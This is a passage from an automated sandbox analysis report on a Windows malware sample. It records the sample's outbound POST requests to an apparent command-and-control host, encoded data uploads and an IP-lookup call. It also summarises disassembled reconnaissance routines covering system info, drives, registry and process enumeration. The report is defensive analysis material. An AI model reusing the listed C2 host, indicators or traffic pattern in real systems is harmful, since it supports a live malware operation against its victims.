                                                          Dec 28, 2024 09:29:42.754369974 CET2472OUTData Raw: 35 78 55 50 6d 50 5c 2f 45 6c 7a 5c 2f 72 66 4e 5c 2f 77 42 62 2b 34 5c 2f 7a 39 4b 32 39 5c 2f 77 44 75 5c 2f 69 41 7a 43 66 50 38 38 6e 5c 2f 50 4b 58 7a 4f 6d 50 38 41 50 2b 65 39 50 2b 37 38 6e 37 76 79 5c 2f 77 44 56 48 45 76 74 5c 2f 6e 32
                                                          Data Ascii: 5xUPmP\/Elz\/rfN\/wBb+4\/z9K29\/wDu\/iAzCfP88n\/PKXzOmP8AP+e9P+78n7vy\/wDVHEvt\/n2waFkMe9tgd\/8AVf8A6\/8APvTGkT53dLff28zmCqAZ5jyHfst\/3f5zf57j39qfJvk3v\/qfKi83\/j68\/wA71uvf\/wDVUMi7pNm\/enMsX7o\/zp\/mfcH3+fK94bfH\/Hr\/ANeP8+Otc50BH\/rPO2b3k\/
                                                          Dec 28, 2024 09:29:42.873897076 CET4944OUTData Raw: 2b 45 48 6a 76 77 62 6f 76 38 41 61 61 5c 2f 45 58 77 70 70 75 6e 61 74 34 5c 2f 38 41 47 50 67 76 52 6d 31 50 55 64 6c 35 71 46 6e 59 77 79 33 36 2b 4c 65 48 76 69 74 34 47 38 51 32 75 6b 7a 57 6e 69 5c 2f 77 69 39 5c 2f 65 77 61 70 5c 2f 62 66
                                                          Data Ascii: +EHjvwbov8Aaa\/EXwppunat4\/8AGPgvRm1PUdl5qFnYwy36+LeHvit4G8Q2ukzWni\/wi9\/ewap\/bfh5NT1e317wXqmlavf6VLoXieLXPDuh6TLqU62S6lDJ4V1jxRpkdjeW8N7qNpq8V9pdn+jZX4gcAVs3r8IZRneWrNMorf2fWyfCUK1GOCqUaKqyoRUMNDCU6WHpulGrKnP2GHnXwlCpKnVxeFp1fyPN\/C3xQo5BQ4
                                                          Dec 28, 2024 09:29:42.873960972 CET7416OUTData Raw: 6b 48 30 58 66 46 66 6a 42 5a 76 78 42 78 64 47 76 78 46 6a 49 5a 62 6b 38 59 59 50 4f 63 64 6c 39 44 45 54 68 4c 4c 4d 50 67 38 50 54 6a 50 43 65 77 6c 69 55 38 2b 79 61 6e 58 6a 54 71 63 31 48 2b 31 4d 75 6c 69 49 30 6e 69 36 4d 71 6e 39 69 65
                                                          Data Ascii: kH0XfFfjBZvxBxdGvxFjIZbk8YYPOcdl9DEThLLMPg8PTjPCewliU8+yanXjTqc1H+1MuliI0ni6Mqn9ieH2f\/TK8EeCP7A4b4Dq4ThnBrHcSyeYcP5fmWKoYXGZfis7r46q4Y361HBVsuynMMfhqlSjyVqGCxrw86n1apGn+9\/\/AA\/hX\/o1dv8Aw94\/+dFR\/wAP4V\/6NXb\/AMPeP\/nRV+F1j8NPEF5pH7O\/iS88
                                                          Dec 28, 2024 09:29:42.873979092 CET2472OUTData Raw: 42 58 78 6a 72 33 68 37 56 50 43 76 37 55 50 37 43 58 77 6f 2b 44 48 37 4e 2b 74 61 37 34 45 38 61 66 44 7a 56 64 50 31 6e 52 76 69 50 38 56 66 43 32 71 65 47 64 54 38 48 65 4b 76 44 65 70 52 61 52 5a 57 73 39 7a 38 54 64 41 30 72 77 68 66 72 65
                                                          Data Ascii: BXxjr3h7VPCv7UP7CXwo+DH7N+ta74E8afDzVdP1nRviP8VfC2qeGdT8HeKvDepRaRZWs9z8TdA0rwhfre3n1gun6YryyLptiskwxNItrbh5R6SsIt0g9nJqn\/AMIz4Zz5v\/CO6Fv3b9\/9kWG7fnO7d9nzu3c7uuec1\/KPEf0JchzzHZhj6PGGc4Cvms\/EJ45wo0Zr2fiJn1PPsyeF92KoYjL8TCVPLMRaVSNGpyY545Uc
                                                          Dec 28, 2024 09:29:43.937016964 CET212INHTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.74970681.29.149.125807584C:\Users\user\Desktop\xdeRtWCeNH.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 28, 2024 09:29:44.833379984 CET284OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                          Host: home.fiveth5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 143
                                                          Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                          Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                          Dec 28, 2024 09:29:46.147330046 CET212INHTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.7497033.218.7.1034437584C:\Users\user\Desktop\xdeRtWCeNH.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-28 08:29:37 UTC52OUTGET /ip HTTP/1.1
                                                          Host: httpbin.org
                                                          Accept: */*
                                                          2024-12-28 08:29:37 UTC224INHTTP/1.1 200 OK
                                                          Date: Sat, 28 Dec 2024 08:29:37 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 31
                                                          Connection: close
                                                          Server: gunicorn/19.9.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Credentials: true
                                                          2024-12-28 08:29:37 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                          Data Ascii: { "origin": "8.46.123.189"}


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:03:29:31
                                                          Start date:28/12/2024
                                                          Path:C:\Users\user\Desktop\xdeRtWCeNH.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\xdeRtWCeNH.exe"
                                                          Imagebase:0x6c0000
                                                          File size:4'452'352 bytes
                                                          MD5 hash:ABCFF1E6AC84A5EC546B6672CE45BF02
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:1.9%
                                                            Dynamic/Decrypted Code Coverage:11.6%
                                                            Signature Coverage:13.3%
                                                            Total number of Nodes:294
                                                            Total number of Limit Nodes:48
                                                            execution_graph 87739 a4b180 Sleep 87583 6dd5e0 87584 6dd652 WSAStartup 87583->87584 87585 6dd5f0 87583->87585 87584->87585 87740 6fb400 87741 6fb40b 87740->87741 87742 6fb425 87740->87742 87745 6c7770 87741->87745 87743 6fb421 87746 6c77b6 recv 87745->87746 87747 6c7790 87745->87747 87748 6c7799 87746->87748 87747->87746 87747->87748 87748->87743 87749 6fe400 87750 6fe412 87749->87750 87752 6fe459 87749->87752 87753 6f68b0 socket ioctlsocket connect getsockname closesocket 87750->87753 87753->87752 87754 6fb3c0 87755 6fb3ee 87754->87755 87756 6fb3cb 87754->87756 87760 6f9290 87756->87760 87767 6c76a0 87756->87767 87757 6fb3ea 87761 6c76a0 send 87760->87761 87762 6f92e5 87761->87762 87763 6f9392 87762->87763 87764 6f9335 WSAIoctl 87762->87764 87763->87757 87764->87763 87765 6f9366 87764->87765 87765->87763 87766 6f9371 setsockopt 87765->87766 87766->87763 87768 6c76e6 send 87767->87768 87769 6c76c0 87767->87769 87770 6c76c9 87768->87770 87769->87768 87769->87770 87770->87757 87771 74603a9 87772 74603af Process32FirstW 87771->87772 87773 7460372 87771->87773 87774 74603ce 87772->87774 87773->87772 87775 6c255d 87799 a49f70 87775->87799 87777 6c256c GetSystemInfo 87778 6c2589 87777->87778 87779 6c25a0 GlobalMemoryStatusEx 87778->87779 87780 6c25ec 87779->87780 87801 74202cd 87780->87801 87805 742029f 87780->87805 87815 742033c 87780->87815 87819 742034e 87780->87819 87822 742028e 87780->87822 87826 7420312 87780->87826 87830 742031a 87780->87830 87800 a49f7d 87799->87800 87800->87777 87800->87800 87802 7420323 GetLogicalDrives 87801->87802 87804 7420377 87802->87804 87806 74202a6 87805->87806 87807 7420267 87805->87807 87806->87807 87812 74202a9 GetLogicalDrives 87806->87812 87808 742028e GetLogicalDrives 87807->87808 87809 7420223 87808->87809 87810 742028a 87809->87810 87811 742028e GetLogicalDrives 87809->87811 87811->87809 87814 7420377 87812->87814 87816 7420340 GetLogicalDrives 87815->87816 87818 7420377 87816->87818 87820 7420356 GetLogicalDrives 87819->87820 87821 7420377 87820->87821 87823 74202ac GetLogicalDrives 87822->87823 87825 7420377 87823->87825 87827 742031e GetLogicalDrives 87826->87827 87829 7420377 87827->87829 87831 7420340 GetLogicalDrives 87830->87831 87833 7420377 87831->87833 87834 6c3d5e 87835 6c3d30 87834->87835 87835->87834 87836 6c3d90 87835->87836 87840 6d0ab0 87835->87840 87843 6cfcb0 6 API calls 87836->87843 87839 6c3dc1 87844 6d05b0 87840->87844 87842 6d0acd 87842->87835 87843->87839 87845 6d05bd 87844->87845 87850 6d07c7 87844->87850 87846 6d0707 WSAEventSelect 87845->87846 87847 6d07ef 87845->87847 87849 6c76a0 send 87845->87849 87845->87850 87846->87845 87846->87850 87848 6d6fa0 select 87847->87848 87847->87850 87851 6d0847 87847->87851 87848->87851 87849->87845 87850->87842 87851->87850 87852 6d09e8 WSAEnumNetworkEvents 87851->87852 87853 6d09d0 WSAEventSelect 87851->87853 87852->87851 87852->87853 87853->87851 87853->87852 87586 6c29ff FindFirstFileA 87587 6c2a31 87586->87587 87588 6c2a5c RegOpenKeyExA 87587->87588 87589 6c2a93 87588->87589 87590 6c2ade CharUpperA 87589->87590 87592 6c2b0a 87590->87592 87591 6c2bf9 QueryFullProcessImageNameA 87593 6c2c3b CloseHandle 87591->87593 87592->87591 87594 6c2c64 87593->87594 87595 6c2df1 CloseHandle 87594->87595 87596 6c2e23 87595->87596 87597 6d1139 87598 6d1148 87597->87598 87600 6d1527 87598->87600 87602 6d0f69 87598->87602 87605 6cfec0 6 API calls 87598->87605 87600->87602 87606 6d22d0 6 API calls 87600->87606 87603 6d0f00 87602->87603 87607 6fd4d0 socket ioctlsocket connect getsockname closesocket 87602->87607 87605->87600 87606->87602 87607->87603 87608 774720 87609 774728 87608->87609 87610 774733 87609->87610 87611 77477d 87609->87611 87620 77476c 87609->87620 87621 775540 socket ioctlsocket connect getsockname closesocket 87609->87621 87613 774774 87615 77482e 87615->87620 87622 779270 87615->87622 87617 774860 87627 774950 87617->87627 87619 774878 87620->87619 87635 7730a0 socket ioctlsocket connect getsockname closesocket 87620->87635 87621->87615 87636 77a440 87622->87636 87624 779297 87626 7792ab 87624->87626 87666 77bbe0 socket ioctlsocket connect getsockname closesocket 87624->87666 87626->87617 87628 774966 87627->87628 87629 7749b9 87628->87629 87634 7749c5 87628->87634 87668 77b590 if_nametoindex 87628->87668 87631 774aa0 gethostname 87629->87631 87629->87634 87631->87629 87631->87634 87632 774a3e 87632->87634 87669 77bbe0 socket ioctlsocket connect getsockname closesocket 87632->87669 87634->87620 87635->87613 87656 77a46b 87636->87656 87637 77a4db 87638 77aa03 RegOpenKeyExA 87637->87638 87650 77ad14 87637->87650 87639 77aa27 RegQueryValueExA 87638->87639 87640 77ab70 RegOpenKeyExA 87638->87640 87642 77aa71 87639->87642 87643 77aacc RegQueryValueExA 87639->87643 87641 77ac34 RegOpenKeyExA 87640->87641 87663 77ab90 87640->87663 87644 77acf8 RegOpenKeyExA 87641->87644 87659 77ac54 87641->87659 87642->87643 87648 77aa85 RegQueryValueExA 87642->87648 87645 77ab66 RegCloseKey 87643->87645 87646 77ab0e 87643->87646 87647 77ad56 RegEnumKeyExA 87644->87647 87644->87650 87645->87640 87646->87645 87653 77ab1e RegQueryValueExA 87646->87653 87649 77ad9b 87647->87649 87647->87650 87652 77aab3 87648->87652 87651 77ae16 RegOpenKeyExA 87649->87651 87650->87624 87654 77ae34 RegQueryValueExA 87651->87654 87655 77addf RegEnumKeyExA 87651->87655 87652->87643 87660 77ab4c 87653->87660 87657 77af43 RegQueryValueExA 87654->87657 87665 77adaa 87654->87665 87655->87650 87655->87651 87656->87637 87667 77b830 if_nametoindex 87656->87667 87658 77b052 RegQueryValueExA 87657->87658 87657->87665 87662 77adc7 RegCloseKey 87658->87662 87658->87665 87659->87644 87660->87645 87662->87655 87663->87641 87664 77afa0 RegQueryValueExA 87664->87665 87665->87657 87665->87658 87665->87662 87665->87664 87666->87626 87667->87637 87668->87632 87669->87629 87670 74704d0 87671 7470473 Process32NextW 87670->87671 87673 7470499 87670->87673 87671->87673 87854 773c00 87855 773c23 87854->87855 87856 773c0d 87854->87856 87855->87856 87858 78b180 87855->87858 87860 78b2e3 87858->87860 87863 78b19b 87858->87863 87860->87856 87862 78b2a9 getsockname 87875 78b020 87862->87875 87863->87860 87863->87862 87865 78b020 closesocket 87863->87865 87866 78af30 87863->87866 87870 78b060 87863->87870 87865->87863 87867 78af4c 87866->87867 87868 78af63 socket 87866->87868 87867->87868 87869 78af52 87867->87869 87868->87863 87869->87863 87873 78b080 87870->87873 87871 78b0b0 connect 87872 78b0bf WSAGetLastError 87871->87872 87872->87873 87874 78b0ea 87872->87874 87873->87871 87873->87872 87873->87874 87874->87863 87876 78b029 87875->87876 87877 78b052 87875->87877 87878 78b04b closesocket 87876->87878 87879 78b03e 87876->87879 87877->87863 87878->87877 87879->87863 87880 78a080 87883 789740 87880->87883 87882 78a09b 87884 789780 87883->87884 87888 78975d 87883->87888 87885 789925 RegOpenKeyExA 87884->87885 87884->87888 87886 78995a RegQueryValueExA 87885->87886 87885->87888 87887 789986 RegCloseKey 87886->87887 87887->87888 87888->87882 87889 6c2f17 87897 6c2f2c 87889->87897 87890 6c31d3 87891 6c2fb3 RegOpenKeyExA 87891->87897 87892 6c315c RegEnumKeyExA 87893 6c31b2 RegCloseKey 87892->87893 87892->87897 87893->87897 87894 6c3046 RegOpenKeyExA 87895 6c3089 RegQueryValueExA 87894->87895 87894->87897 87896 6c313b RegCloseKey 87895->87896 87895->87897 87896->87897 87897->87890 87897->87891 87897->87892 87897->87894 87897->87896 87898 6c31d7 87901 6c31f4 87898->87901 87899 6c3200 87900 6c32dc CloseHandle 87900->87899 87901->87899 87901->87900 87674 6f95b0 87675 6f95c8 87674->87675 87677 6f95fd 87674->87677 87675->87677 87678 6fa150 87675->87678 87679 6fa15f 87678->87679 87681 6fa1d0 87678->87681 87680 6fa181 getsockname 87679->87680 87679->87681 87680->87681 87681->87677 87682 6f6ab0 87683 6f6ad5 87682->87683 87684 6f6bb4 87683->87684 87691 6d6fa0 87683->87691 87685 775ed0 7 API calls 87684->87685 87687 6f6ba9 87685->87687 87688 6f6b54 87688->87684 87688->87687 87689 6f6b5d 87688->87689 87689->87687 87695 775ed0 87689->87695 87692 6d6fd4 87691->87692 87694 6d6feb 87691->87694 87693 6d7207 select 87692->87693 87692->87694 87693->87694 87694->87688 87698 775a50 87695->87698 87697 775ee5 87697->87689 87699 775a58 87698->87699 87703 775ea0 87698->87703 87700 775b50 87699->87700 87710 775b88 87699->87710 87712 775a99 87699->87712 87704 775eb4 87700->87704 87705 775b7a 87700->87705 87700->87710 87701 775e96 87731 789480 socket ioctlsocket connect getsockname closesocket 87701->87731 87703->87697 87732 776f10 socket ioctlsocket connect getsockname closesocket 87704->87732 87721 7770a0 87705->87721 87708 775ec2 87708->87708 87713 775cae 87710->87713 87729 775ef0 socket ioctlsocket connect getsockname 87710->87729 87712->87710 87714 7770a0 6 API calls 87712->87714 87728 776f10 socket ioctlsocket connect getsockname closesocket 87712->87728 87713->87701 87717 78a920 87713->87717 87730 789320 socket ioctlsocket connect getsockname closesocket 87713->87730 87714->87712 87718 78a944 87717->87718 87719 78a977 send 87718->87719 87720 78a94b 87718->87720 87719->87713 87720->87713 87725 7770ae 87721->87725 87723 7771a7 87723->87710 87724 77717f 87724->87723 87738 789320 socket ioctlsocket connect getsockname closesocket 87724->87738 87725->87723 87725->87724 87733 78a8c0 87725->87733 87737 7771c0 socket ioctlsocket connect getsockname 87725->87737 87728->87712 87729->87710 87730->87713 87731->87703 87732->87708 87734 78a903 recvfrom 87733->87734 87735 78a8e6 87733->87735 87736 78a8ed 87734->87736 87735->87734 87735->87736 87736->87725 87737->87725 87738->87723 87902 6f8b50 87903 6f8b6b 87902->87903 87920 6f8bb5 87902->87920 87904 6f8b8f 87903->87904 87905 6f8bf3 87903->87905 87903->87920 87937 6d6e40 select 87904->87937 87922 6fa550 87905->87922 87908 6f8bfc 87910 6f8c1f connect 87908->87910 87911 6f8c35 87908->87911 87918 6f8cb2 87908->87918 87908->87920 87909 6f8cd9 SleepEx 87915 6f8d14 87909->87915 87910->87911 87914 6fa150 getsockname 87911->87914 87912 6fa150 getsockname 87917 6f8dff 87912->87917 87921 6f8ba1 87914->87921 87916 6f8d43 87915->87916 87915->87918 87919 6fa150 getsockname 87916->87919 87917->87920 87938 6c78b0 closesocket 87917->87938 87918->87912 87918->87917 87918->87920 87919->87920 87921->87909 87921->87918 87921->87920 87923 6fa575 87922->87923 87927 6fa597 87923->87927 87940 6c75e0 87923->87940 87925 6c78b0 closesocket 87926 6fa713 87925->87926 87926->87908 87928 6fa811 setsockopt 87927->87928 87933 6fa83b 87927->87933 87935 6fa69b 87927->87935 87928->87933 87930 6faf56 87931 6faf5d 87930->87931 87930->87935 87931->87926 87932 6fa150 getsockname 87931->87932 87932->87926 87933->87935 87936 6fabe1 87933->87936 87946 6f6be0 8 API calls 87933->87946 87935->87925 87935->87926 87936->87935 87945 7267e0 ioctlsocket 87936->87945 87937->87921 87939 6c78c5 87938->87939 87939->87920 87941 6c75ef 87940->87941 87942 6c7607 socket 87940->87942 87941->87942 87944 6c7643 87941->87944 87943 6c762b 87942->87943 87943->87927 87944->87927 87945->87930 87946->87936

                                                            Executed Functions

                                                            Function 006FF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                            • API String ID: 0-1590685507
                                                            • Opcode ID: b4c1cc99adbdf07918a314e70e4721fe1965a216cb6ed83c5674c88a96fa21e1
                                                            • Instruction ID: e088878b9699bd7221e4f810ee7162d8797a79efa0d779232caab802572a09bc
                                                            • Opcode Fuzzy Hash: b4c1cc99adbdf07918a314e70e4721fe1965a216cb6ed83c5674c88a96fa21e1
                                                            • Instruction Fuzzy Hash: 95C29031A04349DFD724CF28C485B6AB7E2BF84314F05866DED989B3A2D771E985CB81
                                                            Function 006C255D Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 282fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSystemInfo.KERNELBASE ref: 006C2579
                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 006C25CC
                                                            • GetDriveTypeA.KERNELBASE ref: 006C2647
                                                            • GetDiskFreeSpaceExA.KERNELBASE ref: 006C267E
                                                            • KiUserCallbackDispatcher.NTDLL ref: 006C27E2
                                                            • SHGetKnownFolderPath.SHELL32 ref: 006C286D
                                                            • FindFirstFileW.KERNELBASE ref: 006C28F8
                                                            • FindNextFileW.KERNELBASE ref: 006C291F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                                            • String ID: ;%l$@$`
                                                            • API String ID: 2066228396-1933959262
                                                            • Opcode ID: 98ab463d790eba75c67a16676397d2d53b283662123f8a40a4241edafc5a4612
                                                            • Instruction ID: 80a0d269e88dba22c2596b7b635c4acf8981f062e4bdb190046cb997634c7f3a
                                                            • Opcode Fuzzy Hash: 98ab463d790eba75c67a16676397d2d53b283662123f8a40a4241edafc5a4612
                                                            • Instruction Fuzzy Hash: 1AD191B49083199FCB10EF68C58569EBBF0FF48344F0089ADE89897351E7759A84DF92
                                                            Function 006C29FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1277 6c29ff-6c2a2f FindFirstFileA 1278 6c2a38 1277->1278 1279 6c2a31-6c2a36 1277->1279 1280 6c2a3d-6c2a91 call b49c50 call b49ce0 RegOpenKeyExA 1278->1280 1279->1280 1285 6c2a9a 1280->1285 1286 6c2a93-6c2a98 1280->1286 1287 6c2a9f-6c2b0c call b49c50 call b49ce0 CharUpperA call a48da0 1285->1287 1286->1287 1295 6c2b0e-6c2b13 1287->1295 1296 6c2b15 1287->1296 1297 6c2b1a-6c2b92 call b49c50 call b49ce0 call a48e80 call a48e70 1295->1297 1296->1297 1306 6c2bcc-6c2c66 QueryFullProcessImageNameA CloseHandle call a48da0 1297->1306 1307 6c2b94-6c2ba3 1297->1307 1317 6c2c6f 1306->1317 1318 6c2c68-6c2c6d 1306->1318 1310 6c2ba5-6c2bae 1307->1310 1311 6c2bb0-6c2bc0 call a48e68 1307->1311 1310->1306 1315 6c2bc5-6c2bca 1311->1315 1315->1306 1315->1307 1319 6c2c74-6c2ce9 call b49c50 call b49ce0 call a48e80 call a48e70 1317->1319 1318->1319 1328 6c2dcf-6c2e1c call b49c50 call b49ce0 CloseHandle 1319->1328 1329 6c2cef-6c2d49 call a48bb0 call a48da0 1319->1329 1370 6c2e21 call 74a0e5f 1328->1370 1371 6c2e21 call 74a0e7f 1328->1371 1372 6c2e21 call 74a0fed 1328->1372 1373 6c2e21 call 74a0e2d 1328->1373 1374 6c2e21 call 74a0ea2 1328->1374 1375 6c2e21 call 74a0f43 1328->1375 1376 6c2e21 call 74a0ee3 1328->1376 1377 6c2e21 call 74a0f60 1328->1377 1378 6c2e21 call 74a0f11 1328->1378 1379 6c2e21 call 74a0fc1 1328->1379 1380 6c2e21 call 74a0fa7 1328->1380 1381 6c2e21 call 74a0f84 1328->1381 1340 6c2d99-6c2dad 1329->1340 1341 6c2d4b-6c2d63 call a48da0 1329->1341 1339 6c2e23-6c2e2e 1342 6c2e37 1339->1342 1343 6c2e30-6c2e35 1339->1343 1340->1328 1341->1340 1350 6c2d65-6c2d7d call a48da0 1341->1350 1344 6c2e3c-6c2ed6 call b49c50 call b49ce0 1342->1344 1343->1344 1359 6c2ed8-6c2ee1 1344->1359 1360 6c2eea 1344->1360 1350->1340 1355 6c2d7f-6c2d97 call a48da0 1350->1355 1355->1340 1361 6c2daf-6c2dc9 call a48e68 1355->1361 1359->1360 1362 6c2ee3-6c2ee8 1359->1362 1363 6c2eef-6c2f16 call b49c50 call b49ce0 1360->1363 1361->1328 1361->1329 1362->1363 1370->1339 1371->1339 1372->1339 1373->1339 1374->1339 1375->1339 1376->1339 1377->1339 1378->1339 1379->1339 1380->1339 1381->1339
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
